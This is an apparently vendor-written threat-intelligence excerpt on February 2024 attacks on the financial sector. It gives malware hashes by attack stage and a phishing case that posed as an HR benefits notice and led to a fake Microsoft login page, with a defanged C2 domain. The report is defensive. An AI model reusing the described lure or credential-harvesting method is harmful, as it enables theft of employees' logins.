Security Issues in the Global Financial Sector – Malware, Phishing, Deep Web & Dark Web cases in February 2024
Statistics of Malware in Distribution Targeting the Financial Sector
Top 10 Major Malware Targeting the Financial Sector
|
Attack Stage |
Malware Type |
MD5 Hash |
|
Stage 1 |
Phishing |
f7db2045ef80e8e4c86db829ec0b6ee6 |
|
Stage 1 |
WebShell |
b597418bea2ff4da50540ed191e1bb55 |
|
Stage 2 |
HackTool |
18cfc7e41afdeb10b15a54e6e39f0463 |
|
Stage 2 |
HackTool |
110dde62258542a1bcdc15a2af5b54d2 |
|
Stage 2 |
Dropper |
19c2decfa7271fa30e48d4750c1d18c1 |
|
Stage 2 |
Dropper |
27ef6917fe32685fdf9b755eb8e97565 |
|
Stage 2 |
Downloader |
60eddc48df4b79c3b96cd20747d04150 |
|
Stage 3 |
Infostealer |
88f183304b99c897aacfa321d58e1840 |
|
Stage 3 |
Infostealer |
c8e7b0d3b6afa22e801cacaf16b37355 |
|
Stage 3 |
Infostealer |
7457dc037c4a5f3713d9243a0dfb1a2c |
Phishing Email Distribution Cases Targeting the Financial Sector
Case 1. Targeting Korea Investment & Securities employees by disguising as a fringe benefit announcement
|
Impersonation target |
– Impersonating as HR/payroll specialist, an announcement on fringe benefits was sent |
|
Phishing methodology |
– Induces to download and execute the HTML file in the email body – The HTML file contained a script that downloads malicious JS file |
|
Infection aftermath |
– Disguises as the Microsoft login page to induce login – Induces input of account credentials, leading to login information leakage – C2 domain: gakgakga[.]online |
Figure. Content of the phishing email impersonating a fringe benefit announcement
Figure. Phishing website disguised as the MS login page
